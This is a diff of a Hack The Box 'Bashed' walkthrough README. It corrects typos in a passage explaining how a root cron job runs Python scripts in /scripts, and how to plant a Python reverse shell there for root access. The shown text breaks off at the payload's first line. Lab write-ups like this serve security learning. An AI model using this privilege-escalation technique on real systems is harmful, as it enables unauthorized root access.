madneal/htb/Bashed/README.md

 su -u scrriptmanager bash -i
 ```

 Try to enumerate the files.
-And I find an interesting folder inside `/script`.
-There are two files test.py and test.txt.
+And I find an interesting folder inside `/scripts`.
+There are two files `test.py` and `test.txt`.
 Try to display the content of `test.py`.

 [![AghxO0.png](https://s2.ax1x.com/2019/04/04/AghxO0.png)](https://imgchr.com/i/AghxO0)

-The python script is quite straightforwared.
-It just write `testing 123!` to the file `test.txt`.
+The python script is quite straightforward.
+It just writes `testing 123!` to the file `test.txt`.
 And if we see the attributes of `test.txt`, the modified time of the file changes each minute.
 And the file is owned by root.
-It seems that `root` will execute the python scripts in `/script` folder each minute.
-So utilize a python script to reverse the root shell(accordint to the information above, the python version of the target machine is 2.7):
+It seems that `root` will execute the python scripts in `/scripts` folder each minute.
+So utilize a python script to reverse the root shell(according to the information above, the python version of the target machine is 2.7):

 ```python
 import socket,subprocess,os;